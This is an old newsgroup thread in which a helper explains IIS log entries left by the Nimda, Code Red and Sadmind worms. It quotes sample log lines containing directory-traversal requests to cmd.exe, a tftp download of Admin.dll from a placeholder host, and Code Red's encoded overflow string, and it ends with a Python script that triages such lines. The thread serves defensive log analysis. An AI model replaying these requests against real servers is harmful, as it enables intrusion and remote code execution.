Re: Strange Log File Entries

From: George Hester (hesterloli@hotmail.com)
Date: 11/05/02


From: "George Hester" <hesterloli@hotmail.com>
Date: Tue, 5 Nov 2002 17:21:52 -0500


Excellent. Thanks.

--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
news:uSYo7aHhCHA.2448@tkmsftngp11...
>
> "Jaffa" <jaffa@cakes.com> wrote in message
> news:OU6Yx9GhCHA.2508@tkmsftngp08...
> > Can anyone explain these entries in my log file? Is it a virus attack? I
> > have no idea where they came from and why they are trying to access
> > cmd.exe.
> > I have Win2k SP3 installed, and all the other critical updates. X.X.X.X is
> > the IP address of my IIS server.
> >
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /winnt/system32/cmd.exe 404 3 144 124 0 - - -
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /winnt/system32/cmd.exe 404 3 144 91 0 - - -
> > 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD
> > /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -
>
> Yes, looks like an old worm.  The codes 404 and 500 show that this was
> probably not successful.
>
> Note that not only do you need the latest updates, but you also need to have
> your web server configured correctly, per the hardening Windows 2000 and IIS
> checklists at www.microsoft.com/technet/security, www.nsa.gov,
> http://rr.sans.org, etc.  It also sounds like you have not installed
> IISlockdown which includes URLScan, a very helpful tool in blocking this
> stuff.
>
> Read below for more info on reading your IIS logs:
>
> ================
>
> These are signs of well-known worms [the Code Red and/or Nimda worm] that
> spread from server to infected server.  Probably every web server on the
> Internet has received and will continue to receive these "attacks," perhaps
> several times a day, whether or not the servers are vulnerable to the worm,
> even if firewalls and/or antivirus are being used.
>
> The IP address that is sending the requests to your server is likely another
> infected web server and not necessarily a hacker.
>
> If you are seeing the log entries in the URLSCAN.LOG file, then URLScan has
> successfully blocked that worm attack.  [However, the existence of URLScan
> does not necessarily prove that a computer is free of all viruses and worms;
> for example, a computer that was infected with a worm before URLScan was
> installed could still be infected.]
>
> The best way to tell whether your server has been infected is to install and
> use an antivirus program.
>
> It is not necessarily always accurate to deduce from the 200, 404 and 500 /
> 502 codes in a web server log whether or not the server has been infected.
> For more information on this, see the section in this FAQ entitled "I found
> a code 200 [or 502] in my IIS logs, does that mean my web server has been
> successfully hacked?"
>
> For more information on these worm attacks, visit the web site of your
> favorite antivirus vendor and/or visit the links below:
>
> www.cert.org
> www.cve.mitre.org/cve
> www.nipc.gov
> www.eeye.com
> www.microsoft.com/technet/security
>
> Below are samples of what an IIS web server log would look like when
> attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms:
>
>
> NIMDA LOOKS LIKE THIS    =======================
>
> [Note that the system is likely compromised if you see a code 200 in the
> line where the "tftp.exe" command is used to download the file "Admin.dll,"
> as in the last line below.  Note however that the lines below containing the
> "copy" and "echo" commands were also successful, despite the 502 code which
> usually indicates failure.]
>
> GET /scripts/root.exe?/c+dir 200 -
> GET /MSADC/root.exe?/c+dir 200 -
> GET /c/winnt/system32/cmd.exe?/c+dir 200 -
> GET /d/winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 -
>
> GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 -
>
>
> CODE RED LOOKS LIKE THIS:  =======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red
> attack does not necessarily indicate success or failure.  It means that the
> .ida mapping has not been removed from the IIS server, and it probably
> should be.]
>
> GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
> b%u53ff%u0078%u0000%u00=a
>
>
> CODE RED II LOOKS LIKE THIS:  ======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red
> attack does not necessarily indicate success or failure.  It means that the
> .ida mapping has not been removed from the IIS server, and it probably
> should be.]
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a 200 -
>
>
> SADMIND / IIS WORM LOOKS LIKE THIS:  ===============
>
> [Note that this is what the log looks like on a successfully compromised
> system - the code 502 after the "copy" and "echo" commands does not indicate
> failure here, the commands were successful despite the 502.]
>
> GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
> GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
> GET /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> [Thanks to "Gurn" and others]
> ________________________________________________________
>
> (11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web
> server has been successfully hacked?
>
> A:  Not necessarily.  Because of this uncertainty, the best way to tell
> whether your server has been infected is to install and use an antivirus
> program.
>
> Normally, a code 502 in an IIS web server log indicates that the
> request was unsuccessful.  However, in some cases, the code 502 does not
> indicate failure [for example the code 502 after the "copy" and "echo"
> commands used by the Sadmind / IIS Worm and Nimda].
>
> Similarly, a code 200 after a line in an IIS web server log indicates that
> the request was successful.  However, read the post below by Paul Lynch
> regarding a 200 code after a "GET /default.ida" request [as with the Code
> Red worm]:
>
> "...a lot of confusion surrounds the 200 return code in response to the GET
> /default.ida request.
>
> In a nutshell what this means is that if you haven't removed the .ida
> mapping IIS processes the request successfully and returns a 200 to the
> browser.
>
> What it *doesn't* mean is that the worm has successfully penetrated your
> machine.  A patched Index Service will still return a 200 to a browser if
> the .ida mapping is present."
>
> A code 404 in the logs so far still appears to indicate an unsuccessful
> request [or attack], due to the attacker or worm requesting a file that does
> not exist on the server.
>
> Again, because of this uncertainty, the best way to tell whether your server
> has been infected is to install and use an antivirus program.
>
> [Thanks to Paul Lynch]
>
>
>
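As an added example (not part of the thread or of any Microsoft tool), the following script applies the status-code caveats from the quoted FAQ to IIS log lines: 404 on a cmd.exe request means the request failed, 200 on the tftp/Admin.dll line means the host is likely compromised, 502 after copy/echo does not prove failure, and 200 on default.ida only proves the .ida mapping is still present. The log lines, IP addresses and verdict strings are constructed here in the poster's field layout.

```python
from urllib.parse import unquote

# Constructed sample lines in the poster's IIS W3C layout (date time c-ip user
# site s-ip method uri status ...); query strings stay inside the uri field.
SAMPLE_LOG = """\
2002-11-04 21:15:28 80.130.13.155 - W3SVC1 10.0.0.2 HEAD /winnt/system32/cmd.exe 404 3 144 124 0 - - -
2002-11-04 21:15:32 80.130.13.155 - W3SVC1 10.0.0.2 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -
2002-11-04 21:16:01 80.130.13.155 - W3SVC1 10.0.0.2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 0 0 0 0 - - -
2002-11-04 21:16:02 80.130.13.155 - W3SVC1 10.0.0.2 GET /scripts/root.exe?/c+echo+.././index.asp 502 0 0 0 0 - - -
2002-11-04 21:16:03 80.130.13.155 - W3SVC1 10.0.0.2 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\\Admin.dll 200 0 0 0 0 - - -
2002-11-04 21:17:00 10.0.0.9 - W3SVC1 10.0.0.2 GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3=a 200 0 0 0 0 - - -
2002-11-04 21:18:00 10.0.0.9 - W3SVC1 10.0.0.2 GET /index.html 200 0 0 0 0 - - -
"""

def classify(method, uri, status):
    """Return (family, verdict) for one request, or None when no worm signature matches."""
    decoded = unquote(unquote(uri)).lower()  # undo single and double URL encoding
    if decoded.startswith("/default.ida?"):   # Code Red / Code Red II probe
        verdict = ("200 only shows the .ida mapping is still present; remove it and verify the patch"
                   if status == 200 else "probe answered with status %d" % status)
        return ("Code Red / Code Red II probe", verdict)
    if "cmd.exe" not in decoded and "root.exe" not in decoded:
        return None                            # not one of the signatures discussed
    family = "Nimda / Sadmind-style cmd.exe request"
    if status == 404:
        return (family, "failed: file not found")
    if status == 200 and "tftp" in decoded and "admin.dll" in decoded:
        return (family, "LIKELY COMPROMISED: tftp download of Admin.dll returned 200")
    if status == 200:
        return (family, "cmd.exe/root.exe executed: treat the host as compromised")
    if status == 502 and ("copy" in decoded or "echo" in decoded):
        return (family, "502 after copy/echo does not prove failure: inspect the host")
    return (family, "probably failed (status %d); confirm with antivirus" % status)

def triage(log_text):
    """Return [(line_no, client_ip, family, verdict)] for every line that matches a signature."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        f = line.split()
        if line.startswith("#") or len(f) < 9:  # skip W3C header lines and short lines
            continue
        result = classify(f[6], f[7], int(f[8]))
        if result:
            hits.append((n, f[2], result[0], result[1]))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print("line %d from %s: %s -> %s" % hit)
```

The double `unquote` catches the `%2e`, `%5c` and double-encoded (`%255c`) traversal variants in the thread; the `\xc0\xaf`-style overlong UTF-8 forms are not decoded and are matched only because `cmd.exe` survives in the path.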

